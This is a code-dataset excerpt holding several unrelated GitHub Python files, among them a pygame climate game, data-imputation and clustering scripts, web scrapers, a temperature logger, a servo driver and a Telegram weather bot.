game_map:\n x = 0\n for tile in row:\n if tile == 1:\n display.blit(dirt_img, (x * 10 - scroll[0], y * 10 - scroll[1]))\n if tile == 2:\n display.blit(grass_img, (x * 10 - scroll[0], y * 10 - scroll[1]))\n if tile == 10:\n image = pygame.image.load(\"trash_images/t1.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 20:\n image = pygame.image.load(\"trash_images/t2.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 30:\n image = pygame.image.load(\"trash_images/t3.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 40 or tile == 50:\n image = pygame.image.load(\"trash_images/t4.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 60:\n image = pygame.image.load(\"trash_images/t1.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = image.get_rect()\n if tile == 1 or tile == 2:\n tile_Rects.append(pygame.Rect(x * 10, y * 10, 10, 10))\n x += 1\n y += 1\n\n for obj in obj_list:\n display.blit(obj[1], (obj[2][0] - scroll[0], obj[2][1] - scroll[1]))\n \n player_movement = [0,0]\n if moving_right == True:\n player_movement[0] += 2\n player_flip = False\n if moving_left == True:\n player_movement[0] -= 2\n player_flip = True\n player_movement[1] += player_gravity\n player_gravity += 0.2\n if player_gravity > 3:\n player_gravity = 3\n \n player_rect, collisions = move(player_rect, player_movement, tile_Rects)\n\n greenhouse_effect = collisions_testing(player_rect, obj_list, greenhouse_effect)\n \n if collisions['bottom'] == True:\n player_gravity = 0\n air_timer = 0\n else:\n air_timer += 1\n \n if moving_left == False and moving_right == False:\n player_img = pygame.image.load('images/idle_player.png')\n player_img = pygame.transform.scale(player_img, (9, 18))\n player_rect = pygame.Rect(player_rect.x, player_rect.y, 
player_img.get_width(), player_img.get_height())\r\n        display.blit(pygame.transform.flip(player_img, player_flip, False), (player_rect.x - true_scroll[0], player_rect.y - true_scroll[1]))\r\n    else:\r\n        display.blit(pygame.transform.flip(player_img, player_flip, False), (player_rect.x - true_scroll[0], player_rect.y - true_scroll[1]))\r\n    \r\n    \r\n    for event in pygame.event.get(): # event loop\r\n        if event.type == QUIT:\r\n            pygame.quit()\r\n            sys.exit()\r\n        if event.type == timer:\r\n            greenhouse_effect += 4\r\n        if event.type == KEYDOWN:\r\n            if event.key == K_d:\r\n                moving_right = True\r\n                animation_type = \"run\"\r\n            if event.key == K_a:\r\n                moving_left = True\r\n                animation_type = \"run\"\r\n            if event.key == K_w or event.key == K_SPACE:\r\n                if air_timer < 6:\r\n                    player_gravity = -5\r\n        if event.type == KEYUP:\r\n            if event.key == K_d:\r\n                moving_right = False\r\n            if event.key == K_a:\r\n                moving_left = False\r\n    \r\n    screen.blit(pygame.transform.scale(display, WINDOW_SIZE), (0, 0))\r\n    \r\n    pygame.display.update()\r\n    \r\n    clock.tick(60)\r\n","repo_name":"ShivankC/Climate-Warrior","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":18103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41953350728","text":"from parameters import *\r\nfrom sklearn.model_selection import train_test_split\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = []\r\nnb_pts = 200\r\nvarx=0.25\r\nvary=0.25\r\n\r\n\r\ndef divide_images_and_labels(images, labels):\r\n\r\n    X_train, X_val, Y_train, Y_val = train_test_split(images, labels, test_size=0.2) #images :all_images labels: all_label_numbers\r\n    X_val, X_test, Y_val, Y_test = train_test_split(X_val, Y_val, test_size=0.5)\r\n\r\n    return X_train, Y_train, X_val, Y_val, X_test, Y_test\r\n\r\n\r\ndef create_dataset():\r\n\r\n\r\n    cov = [[varx, 0,0],[0, vary,0],[0,0,0]]\r\n\r\n    mean = [[0,7,0],[5,5.5,1],[2.5,6,2],[1.3,7.5,3],[2.7,7.2,4],[0.8,5.75,5],[4,6.5,6],[2,5,7],[4.2,7.6,8],[3.5,5.1,9]]\r\n\r\n    for i in range(len(mean)):\r\n        # dataset['data'+str(i)] = np.random.multivariate_normal(mean[i], cov, N)\r\n        data.append(np.random.multivariate_normal(mean[i], cov, nb_pts))\r\n\r\n    dataWithLabel=np.random.permutation(np.concatenate(data))\r\n\r\n    # D: the data points\r\n    all_points = dataWithLabel[:,[0,1]]\r\n\r\n\r\n\r\n    # Z: the labels of the data points\r\n    all_label_numbers = dataWithLabel[:,2]\r\n\r\n\r\n\r\n    return dataWithLabel, all_points, all_label_numbers\r\n\r\n\r\n\r\ndef plot_dataset(all_images,dataWithLabel):\r\n    list_colors = ['red', 'green', 'blue', 'orange', 'black', 'purple', 'yellow', '#bd2309', 'cyan', 'm']\r\n    for i in range(len(dataWithLabel)):\r\n        for index in range(len(list_colors)):\r\n            if dataWithLabel[i,2]==index :\r\n                plt.scatter(all_images[i, 0], all_images[i, 1], c=list_colors[index], marker='x')\r\n\r\n    plt.xlabel('x')\r\n    plt.ylabel('y')\r\n    plt.title('samples')\r\n    plt.show()\r\n\r\n\r\n","repo_name":"baptistepouthier/plancton","sub_path":"SVM/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7824677729","text":"from app.utils import is_valid_name\n\n\nclass HumanPlayer:\n\n    def __init__(self, mark: str) -> None:\n        self.mark = mark\n\n    def set_player_info(self, meta_str: str) -> bool:\n        \"\"\"\n        Ask the name of the player and set it\n        Args:\n            meta_str: the player's turn, either First player or Second player\n        \"\"\"\n        while True:\n            name = input(f'Enter a {meta_str} Name - {self.mark}: ')\n            
try:\n                if is_valid_name(name):\n                    self.name = name\n                    return True\n                else:\n                    print(\"Invalid Name\")\n            except KeyboardInterrupt:\n                print(\"Keyboard Interrupted\")\n\n    def get_choice(self, game_object: object) -> int:\n        \"\"\"\n        Get player's choice\n        Args:\n            game_object: Context of the game, used to validate the chosen cell\n        Returns:\n            position: Player's choice for the move\n        \"\"\"\n        while True:\n            position = input(f\"{self.name}'s turn ==> Enter your choice: \")\n            try:\n                position = int(position.strip())\n                if not game_object.is_valid_cell_no(position):\n                    print(\"Position is Invalid\")\n                    continue\n                if not game_object.is_cell_available(position):\n                    print(\"Cell is already occupied\")\n                    continue\n                return position\n            except BaseException:\n                print(\"Given input is invalid\")\n","repo_name":"aadityanj/tic_tac_toe","sub_path":"app/players/human_player.py","file_name":"human_player.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41101260853","text":"import lidaExcel\nimport statistical\nimport copy\nfrom knn_final import knn_impute\nfrom KMeans import KMeansInterface\nfrom DBScan import DBScanInterface\nfrom hierarchical import HierarchicalInterface\n\n##############################################################################\nprint(\"Hello. This is a simple control for users\\n\")\nprint(\"We have some training datasets for your tests, they are: \\n1 - Wine\\n2 - Balance\\n3 - Iris\\n4 - Glass\\n5 - Breast Cancer Wisconsin\\n\")\nname = int(input(\"Select your training dataset :\"))\n\nif(name == 1):\n    path = 'Datasets/wine.xlsx'\n    name = 'wine'\nelif(name == 2):\n    path = 'Datasets/balance.xlsx'\n    name = 'balance'\nelif(name == 3):\n    path = 'Datasets/iris.xlsx'\n    name = 'iris'\nelif(name == 4):\n    path = 'Datasets/glass.xlsx'\n    name = 'glass'\nelif(name == 5):\n    path = 'Datasets/cancer.xlsx'\n    name = 'cancer'\n    \n\nds = lidaExcel.leMatriz(path, name)\nprint(\"You chose: %s\\n\" % name)\n\nrate = float(input(\"Now, choose the rate of MV in the training dataset: \"))\nmv = lidaExcel.geraMissingValues(ds,rate)\nlidaExcel.gravaNovaAba(mv,path,\"MV\")\nprint(\"Sheet stored in %s.xlsx\\n\" %name)\nprint(\"####################################################################\\n\")\nprint(\"We have 5 imputation methods:\\n1 - Mean\\n2 - Mode\\n3 - Median\\n4 - Deviation\\n5 - KNN\\n\")\n\nsheetCount = 5\n\n\nmv1 = copy.deepcopy(mv)\nmatrix = statistical.imputationMean(mv1)\nlidaExcel.gravaNovaAba(matrix,path,\"Mean\")\n\nmatrix = statistical.imputationMode(mv)\nlidaExcel.gravaNovaAba(matrix,path,\"Mode\")\n\n# NOTE: the \"Median\" sheet below is filled with imputationMode; a median imputation is probably what was intended\nmv2 = copy.deepcopy(mv)\nmatrix = statistical.imputationMode(mv2)\nlidaExcel.gravaNovaAba(matrix,path,\"Median\")\n\nmatrix = statistical.imputationDesvioPadrao(mv)\nlidaExcel.gravaNovaAba(matrix, path, \"Deviation\")\n\nmatrix = [knn_impute(reg,mv,3,\"mean\") for reg in mv] \nlidaExcel.gravaNovaAba(matrix,path,\"KNN\")\n \nprint(\"You imputed at the rate of %s\" % rate)\n\n#We'll now apply clustering methods on each sheet of dataset\nprint(\"We have 3 clustering methods:\\n1 - KMeans\\n2 - DBScan\\n3 - Hierarchical\\n\")\nclustering = int(input(\"Enter the number of a clustering method (press 0 to exit loop): \"))\nprint(\"We'll apply the clustering method on all sheets of dataset\")\n\nwhile(clustering!=0):\n    if clustering == 1:\n        for i in range(2, sheetCount+1):\n            print(\"For the sheet %d\\n\" % i)\n            KMeansInterface(path, i)\n    elif clustering == 2:\n        for i in range(1, sheetCount):\n            DBScanInterface(path, i)\n    
elif clustering == 3:\n        for i in range(1, sheetCount):\n            HierarchicalInterface(path, i)\n    clustering = int(input(\"Choose again or press 0 to exit loop: \"))\n","repo_name":"jefnvo/IC-MissingValues","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26734804851","text":"#######################################################################\n##  CS 101 Lab\n##  Program 8\n##  Name: Osay Edo Ohonba\n##  Email: ooenw7@umsystem.edu\n##\n##  PROBLEM : Create a program to allow the user to enter 2 types of grades and manage them.\n##  ALGORITHM :\n##  import math and time\n##  Define functions\n##  logic\n##  End display\n##  ERROR HANDLING:\n##  N/A\n##  OTHER COMMENTS:\n##  Any special comments\n##\n########################################################################\nimport math\nimport time\nassignment_scores = []\ntest_scores = []\n\ndef grade_menu():\n    print(' Grade Menu\\n1 - Add Test\\n2 - Remove Test\\n3 - Clear Tests\\n4 - Add Assignment\\n5 - Remove Assignments\\n6 - Clear Assignments\\nD - Display Scores\\nQ - Quit')\ndef add_test():\n    test = int(input('Enter the new Test score 0-100 ==> '))\n    if test < 0 or test > 100:\n        return\n    else:\n        test_scores.append(test)\ndef remove_test():\n    # remove the most recently added test score, if any\n    if test_scores:\n        test_scores.pop()\ndef clear_tests():\n    test_scores.clear()\ndef add_assignment():\n    assig = int(input('Enter the new Assignment score 0-100 ==> '))\n    if assig < 0 or assig > 100:\n        return\n    else:\n        assignment_scores.append(assig)\ndef remove_assignment():\n    # remove the most recently added assignment score, if any\n    if assignment_scores:\n        assignment_scores.pop()\ndef clear_assignment():\n    assignment_scores.clear()\ndef display_scores():\n    print(test_scores, assignment_scores)\n\nif __name__ == '__main__':\n    u_input = ''\n    while u_input != 'Q' and u_input != 'q':\n        grade_menu()\n        u_input = input('\\n==> ')\n        if u_input == '1': add_test()\n        if u_input == '2': remove_test()\n        if u_input == '3': clear_tests()\n        if u_input == '4': add_assignment()\n        if u_input == '5': remove_assignment()\n        if u_input == '6': clear_assignment()\n        if u_input == 'D' or u_input == 'd': display_scores()\n        if u_input == 'Q' or u_input == 'q': print('Thank you for using this service. THE END')\n    \n\n\n\n\n\n\n\n\n\n\n","repo_name":"oedo3/101L_005L","sub_path":"assig_8/code/code_8.py","file_name":"code_8.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19548337872","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\"\"\"\n@version: python3.7\n@author: nero\n@contact: 627482453@qq.com\n@software: PyCharm\n@file: DailySpider.py\n@time: 2020/03/08\n@description: daily logs of weiboSpider\n\"\"\"\nfrom abc import ABC\n\nimport scrapy\n\nfrom weibo import SpiderUtils\nfrom weibo.items import DailyIndexItem, DailyCommentItem\n\n\nclass DailySpider(scrapy.Spider, ABC):\n    # start the spider by the name.\n    name = SpiderUtils.get_spider_name1()\n\n    def __init__(self, idlist=\"0\", **kwargs):\n        super().__init__(**kwargs)\n        self.list_id = idlist\n\n    def start_requests(self):\n        \"\"\"\n        Before starting to crawl.\n\n        step:\n        1. init DailyItem\n        2. get the url\n        3. 
scrapy.Request\n\n        yield scrapy.Request() to self.parse_index\n\n        \"\"\"\n\n        # get index url\n        url = SpiderUtils.get_index_url(self.list_id)\n        # yield scrapy.Request\n        # to self.parse_index\n        # item -> DailyItem\n        yield scrapy.Request(url=url, callback=self.parse_index)\n\n    def parse_index(self, response):\n        \"\"\"\n\n        Parse the index page.\n        step:\n        1. get the item.\n        2. save the index page.\n        3. get the comment-mid to splice the comment-url.\n        4. request the comment-page.\n\n        @param response:\n        \"\"\"\n        item = DailyIndexItem()\n        item['index'] = response.text\n\n        # get dir_comments from index\n        # [\"length\": int, \"mids\": str, \"comment_urls\": str]\n        dir_comments = SpiderUtils.get_daily_comment_url(response.text)\n\n        yield item\n\n        for i in range(dir_comments[\"length\"]):\n            yield scrapy.Request(url=dir_comments[\"comment_urls\"][i], callback=self.parse_comment,\n                                 meta={'mid': dir_comments[\"index_mids\"][i]})\n\n    def parse_comment(self, response):\n        \"\"\"\n        Parse the comment page.\n\n        step:\n        1. save the comment.\n        2. yield the item.\n\n        @param response:\n        @return:\n        \"\"\"\n\n        item = DailyCommentItem()\n        # get the mid\n        mid = response.meta['mid']\n\n        item['comment'] = mid + \"|\" + response.text\n\n        yield item\n","repo_name":"yu627482453/PublicOpinionSystemV1","sub_path":"project/Spider/weiboSpider/weibo/spiders/DailySpider.py","file_name":"DailySpider.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"38782593929","text":"from datetime import datetime\nfrom time import sleep\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nfrom temp_logger import temp_row_maker \n\n# scope = ['https://spreadsheets.google.com/feeds']\n# credentials = ServiceAccountCredentials.from_json_keyfile_name('/home/pi/temp_logger/palace temp logger-88911bdd605e.json', scope)\n# gc = gspread.authorize(credentials)\n# sh = gc.open(\"palace kitchen temp log\")\n\n#wks = gc.open(\"palace kitchen temp log\").sheet1\n#wks.update_acell('A1', 'test')\n\n\n#print(wks)\n\ndef sheets_logger():\n    scope = ['https://spreadsheets.google.com/feeds']\n    credentials = ServiceAccountCredentials.from_json_keyfile_name('/home/pi/temp_logger/palace temp logger-88911bdd605e.json', scope)\n    gc = gspread.authorize(credentials)\n    sh = gc.open(\"palace kitchen temp log\")\n    try:\n        worksheet = sh.worksheet(datetime.now().strftime('%m.%d.%Y'))\n        worksheet.append_row(temp_row_maker())\n    except gspread.exceptions.WorksheetNotFound:\n        worksheet = sh.add_worksheet(datetime.now().strftime('%m.%d.%Y'),\n                                     rows='1',\n                                     cols='7')\n        worksheet.append_row(['time',\n                              'sensor 1',\n                              'sensor 2',\n                              'sensor 3',\n                              'sensor 4',\n                              'sensor 5',\n                              'sensor 6'])\n        worksheet.append_row(temp_row_maker())\n    except Exception as e:\n        with open('error_log.txt','a+') as er_log:\n            # the timestamp is a string, so no float format spec here\n            er_log.write('ERROR: {} at {}\\n'.format(str(e), datetime.now().strftime('%m/%d/%Y, %I:%M %p')))\n\n\nwhile True:\n    sheets_logger()\n    sleep(60)\n","repo_name":"gabrielx52/temp_logger","sub_path":"sheets_log.py","file_name":"sheets_log.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33031594418","text":"import re\nimport json\nfrom urllib import request\nfrom pyquery import PyQuery as pq\nfrom parallel_corpus_utils import parallel_corpus_info\n\n\n\nheaders = {\n    \"Host\": \"uyghur.people.com.cn\",\n    \"Cookie\": \"wdcid=62baa762b4832f8a; 
wdlast=1545032438; wdses=4169b7d11f9e8cf1\",\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\",\n \"Referer\": \"http://uyghur.people.com.cn/\"\n }\n\nsuffix_dict = {}\n# used for new indexes\nsuffix_dict_temp = {}\npattern1 = re.compile(r\"/\\d+/\\d+.html\")\npattern2 = re.compile(r\"/\\S+\\d/index.html\")\npattern3 = re.compile(r\"\\S+\\d\\S*\")\n\n#get \"/******/index.html\"\ndef get_url_suffixes():\n url_suffixes = []\n url = \"http://uyghur.people.com.cn/\"\n try:\n req = request.Request(url, headers=headers)\n page = request.urlopen(req).read()\n doc = pq(page)\n tag_li_s = doc(\"ul li\")\n for i in range(len(tag_li_s)):\n for j in range(len(tag_li_s.eq(i).children())):\n suffix = tag_li_s.eq(i).children().eq(j).attr(\"href\")\n temp = check_suffixes(suffix)\n if temp and temp not in url_suffixes:\n url_suffixes.append(temp)\n url_suffixes.append(\"/311301/311302/index.html\")\n print(url_suffixes)\n for suff in url_suffixes:\n suffix_dict[suff] = []\n return url_suffixes\n\n except Exception as e:\n print(e)\n\n\n#input \"/******.index\", get \"/******/******.html\"\ndef get_news_url(url_suffix):\n url = \"http://uyghur.people.com.cn\" + url_suffix\n other_suffix = []\n complete_suffixes = []\n try:\n req = request.Request(url, headers=headers)\n page = request.urlopen(req).read()\n doc = pq(page)\n tag_li_s = doc(\"ul li\")\n for i in range(len(tag_li_s)):\n for j in range(len(tag_li_s.eq(i).children())):\n t = tag_li_s.eq(i).children().eq(j).attr(\"href\")\n if t is None:\n continue\n if re.match(pattern2, t) and t not in suffix_dict.keys():\n suffix_dict_temp[t] = []\n if re.match(pattern1, t):\n l = '/' + t.split(\"/\")[1] + '/index.html'\n if l not in suffix_dict.keys():\n suffix_dict_temp[l] = [t]\n else:\n if t not in suffix_dict[l]:\n suffix_dict[l].append(t)\n\n return complete_suffixes\n\n except Exception as e:\n print(e)\n\n\n#check\ndef check_suffixes(suffix):\n if not suffix:\n print(\"Before: \" + \"None\")\n else:\n print(\"Before: \" + suffix)\n if not suffix or len(suffix) > 30 or not re.match(pattern3, suffix):\n print(\"After: \" + \"None\")\n return None\n if re.match(pattern2, suffix):\n print(\"After: \" + suffix)\n return suffix\n if re.match(pattern1, suffix):\n l = '/' + suffix.split(\"/\")[1] + '/index.html'\n print(\"After: \" + l)\n return l\n\n#use url to get the news.\ndef get_news_contents(url):\n try:\n url = \"http://uyghur.people.com.cn/155989/15747053.html\"\n req = request.Request(url, headers=headers)\n page = request.urlopen(req).read()\n doc = pq(page)\n title = doc(\"#p_title\").text()\n contents = doc(\"#zoom\").text()\n\n\n except Exception as e:\n print(e)\n\n\n#slice up the sentences to right length\ndef slice_contents(contents, punctuations):\n assert isinstance(contents, str)\n assert isinstance(punctuations, list)\n sentences_list = contents.split(\".\")\n print(len(sentences_list))\n for s in sentences_list:\n if len(s.split(\" \")) > 40:\n for i in range(4):\n # if s.find(\"i\") in\n continue\n\n\ndef main():\n MAX_LEN, MIN_LEN, punctuations = parallel_corpus_info(\"./uy.txt\")\n # get_url_suffixes()\n # for k in suffix_dict.keys():\n # get_news_url(k)\n # print(suffix_dict)\n # with open(\"uy_url_suffixes.json\", \"w\") as f:\n # f.write(json.dumps(suffix_dict))\n\n with open(\"./uy_url_suffixes.json\", \"r\") as f:\n suffixes = json.loads(f.readline())\n assert isinstance(suffixes, dict)\n # for key, suffix_list in suffixes.items():\n # for suffix in suffix_list:\n # continue\n 
get_news_contents(\"\")\n\n\n\n\n\n # f = open(\"./test.txt\", \"w\")\n # f.write(contents)\n # f.close()\n\n\n #\n # urls = doc('li')\n #\n # print(type(urls.children().eq(0).text()))\n #\n # s = urls.children().eq(0)\n # print(s)\n # u = s.encode(\"utf-8\").decode(\"gb2312\")\n # print(u)\n # d = s.encode(\"utf-8\").decode(\"unicode-escape\")\n # print(d)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Ivan-Young/UygCorpus","sub_path":"get_uyg_monolingual_corpus.py","file_name":"get_uyg_monolingual_corpus.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27923607217","text":"from calvinextras.calvinsys.io.servomotor import BaseServo\nimport Adafruit_PCA9685\n\n\nclass Adafruit_pca9685(BaseServo.BaseServo):\n \"\"\"\n Calvinsys object handling servo using ADAFRUIT PCA9685\n \"\"\"\n def init(self, angle, frequency, minimum_pulse, maximum_pulse, *args, **kwargs):\n self._i2c_addr = kwargs.get(\"i2c_addr\", 0x40)\n self._pin_base = kwargs.get(\"pin_base\", 0x0)\n self._bus_num = kwargs.get(\"bus_num\", 1)\n \n self._angle = angle\n \n self._minimum_pulse = minimum_pulse\n self._maximum_pulse = maximum_pulse\n \n self._pwm = Adafruit_PCA9685.PCA9685(address=self._i2c_addr, busnum=self._bus_num)\n self._frequency = frequency\n self._pwm.set_pwm_freq(self._frequency)\n\n scaling = (1.0 / self._frequency / 4096 * 10**6)\n \n self._servo_min = int(round(self._minimum_pulse / scaling))\n self._servo_max = int(round(self._maximum_pulse / scaling))\n \n def can_write(self):\n return self._pwm is not None\n \n def write(self, angle_or_pulse):\n if self._angle:\n return self._set_angle(angle_or_pulse)\n else :\n return self._set_pulse(angle_or_pulse)\n\n def _set_angle(self, angle):\n if angle < 0 :\n angle = 0\n elif angle > 180:\n angle = 180\n\n self._set_pwm(int(round(((self._servo_max - self._servo_min) / 180.) 
* angle)))\n\n    def _set_pwm(self, pulse):\n        # Force within range\n        pulse = min(self._servo_max, max(self._servo_min, pulse))\n        self._pwm.set_pwm(self._pin_base, 0, pulse)\n    \n    def close(self):\n        self._pwm = None","repo_name":"EricssonResearch/calvin-base","sub_path":"calvinextras/calvinsys/io/servomotor/raspberry_pi/Adafruit_pca9685.py","file_name":"Adafruit_pca9685.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"18"} +{"seq_id":"19337587134","text":"'''\nLet's write this to match the format the problem requires\n'''\nimport sys\ninput=sys.stdin.readline\n\nimport heapq\nfrom collections import deque\nN=int(input())\nList=[]\nheapq.heapify(List)\nGraph=['' for _ in range(N+1)]\nOperator=[{'parent':0,'lchild':0,'rchild':0,'val':0} for _ in range(2*N)]\nSUM=0\n# First, build the tree.\nfor j in range(1,2*N):\n    temp=list(input().split())\n    if len(temp)==1: \n        x=int(temp[0])\n        Operator[j]['val']=x\n        heapq.heappush(List,x)\n        SUM+=x\n    else: \n        x,y,z=temp[0], int(temp[1]),int(temp[2])\n        Operator[j]['lchild']=y; Operator[y]['parent']=j\n        Operator[j]['rchild']=z; Operator[z]['parent']=j\n        Operator[j]['val']=x\n        if j==2*N-1: Operator[j]['parent']=j\nroot=Operator[2*N-1]['parent']\n\nwhile root!=Operator[root]['parent']:\n    root=Operator[root]['parent']\n\n\nq=deque([])\n# if Operator[root]['val']=='+':\n#     q.append([root,0]) # when the root is '+'\n# else:\n#     q.append([root,1]) # when the root is '-'\n\n\nq.append([root,0]) # initially treat the root as '+'\nminus=0\nwhile q:\n    node,operator=q.popleft()\n    if 0< node and node<=N: # if it is a number (a leaf)\n        if operator: \n            minus+=1\n        #print('current node',node)\n        continue\n    q.append([Operator[node]['lchild'], operator])\n    if Operator[node]['val']=='+':\n        q.append([Operator[node]['rchild'],operator])\n    if Operator[node]['val']=='-': # flip the sign for the right subtree\n        q.append([Operator[node]['rchild'],operator^1])\n\n# print(minus)\n\nfor i in range(minus):\n    x=heapq.heappop(List)\n    SUM-=2*x\n\nprint(SUM)\n# First, build the tree.\n\n","repo_name":"Youngseo-Jeon0313/baekjoon","sub_path":"백준17501.py","file_name":"백준17501.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"2926736486","text":"import tweepy\n\n\ndef login(name):\n    lines = []\n    with open(name) as f:\n        lines = f.readlines()\n\n    apiKey = lines[0].strip(\"\\n\")\n    apiSecret = lines[1].strip(\"\\n\")\n    accessToken = lines[2].strip(\"\\n\")\n    accessTokenSecret = lines[3].strip(\"\\n\")\n    \n    # Create the authentication\n    authenticate = tweepy.OAuthHandler(apiKey, apiSecret)\n\n    # Set the access token and the access token secret\n    authenticate.set_access_token(accessToken, accessTokenSecret)\n\n    # Create the API object\n    api = tweepy.API(authenticate)\n    \n    return api\n\n\n\n\n","repo_name":"Pierciest/financial-analysis-for-crypto-currencies","sub_path":"modules/loginCred.py","file_name":"loginCred.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"21085473811","text":"import tensorflow as tf\nfrom keras_helper import KeyboardPosition, RemoveTailNoise, word_accuracy, get_lr_metric\nfrom tensorflow.keras.layers import Input, Dense, Concatenate, Dropout\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.models import Model\n\ndef get_our_model(learning_rate = 0.001,dropout_rate = 0.2):\n    input_node = Input(shape=(21,3))\n    shift_controller = input_node[:,:,:1]\n    x = 
Dense(256,activation='relu')(input_node)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Concatenate()([x,input_node])\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(256,activation='relu')(x)\n x = Dropout(dropout_rate)(x)\n x = Dense(2)(x)\n concat = Concatenate(axis=2)([shift_controller,x])\n keyboard_position = KeyboardPosition()(concat)\n cleand_keyboard_positioin = RemoveTailNoise()([keyboard_position,input_node])\n model_train = Model(inputs=input_node, outputs=concat)\n model_inference = Model(inputs=input_node, outputs=cleand_keyboard_positioin)\n optimizer = Adam(learning_rate=learning_rate)\n model_train.compile(loss='mean_squared_error', optimizer=optimizer)\n model_inference.compile(loss='mean_squared_error', metrics=[word_accuracy])\n return model_train, model_inference","repo_name":"pureexe/lexpimmon-train","sub_path":"model_our.py","file_name":"model_our.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16189232731","text":"\"\"\"Apps that need to be registered for the scheduler.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom django.apps import AppConfig\n\nlogger = logging.getLogger('flash_stache')\n\n\nclass SchedulerConfig(AppConfig):\n \"\"\"FlashArray Monitoring Scheduler configuration.\"\"\"\n name = 'scheduler'\n verbose_name = 'FlashArray Monitoring Scheduler'\n\n def ready(self):\n \"\"\"Get the FlashArray model and look for enabled jobs that need to be scheduled.\"\"\"\n try:\n self.reschedule_repeatable_jobs()\n except Exception as error:\n logger.error('Failed to connect to the scheduler.\\n{}'.format(error))\n\n def reschedule_repeatable_jobs(self):\n \"\"\"Ensure that repeating jobs are scheduled.\"\"\"\n flash_array = self.get_model('FlashArray')\n # Only schedule enabled arrays\n jobs = flash_array.objects.filter(enabled=True)\n _reschedule_jobs(jobs)\n logger.info('Scheduled/Re-scheduled jobs: {}'.format(jobs))\n\n\ndef _reschedule_jobs(jobs):\n \"\"\"Reschedule one or more jobs.\"\"\"\n for job in jobs:\n if not job.is_scheduled():\n logger.info('Job {} was not scheduled. 
Scheduling it now.'.format(job.id))\n job.save()\n","repo_name":"PureStorage-OpenConnect/FlashStache","sub_path":"flasharray/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"12950069156","text":"import logging\r\nfrom telegram.ext import Updater\r\nfrom telegram.ext import CommandHandler #copy\\ start\r\nfrom telegram.ext import MessageHandler\r\nfrom telegram.ext import Filters\r\nimport requests\r\nimport json\r\nimport random\r\n\r\n\r\n\r\nclass WeatherApi:\r\n def __init__(self, token):\r\n self.token = token\r\n \r\n def data_for(self, *args):\r\n query = ','.join(args)\r\n url = f\"http://api.openweathermap.org/data/2.5/weather?q={query}&appid={self.token}&units=metric\"\r\n data = requests.get(url)\r\n return data.json()\r\n \r\n\r\nclass Bot:\r\n def __init__(self, token):\r\n self.enable_logging()\r\n self.updater = Updater(token=token, use_context = True)\r\n self.dispatcher = self.updater.dispatcher\r\n self.weather_api = WeatherApi('#############################')\r\n self.add_handlers() #обработчик создаваемых событий\r\n \r\n def enable_logging(self):\r\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\n \r\n def add_handlers(self):\r\n start = CommandHandler('start', self.start) #start\r\n self.dispatcher.add_handler(start)\r\n \r\n message = MessageHandler(Filters.text & (~Filters.command), self.msg)\r\n self.dispatcher.add_handler(message)\r\n \r\n weather = CommandHandler('weather', self.show_weather)\r\n self.dispatcher.add_handler(weather)\r\n \r\n suggest = CommandHandler('suggest_clothes', self.suggest)\r\n self.dispatcher.add_handler(suggest)\r\n \r\n unknown = MessageHandler(Filters.command, self.unknown)\r\n 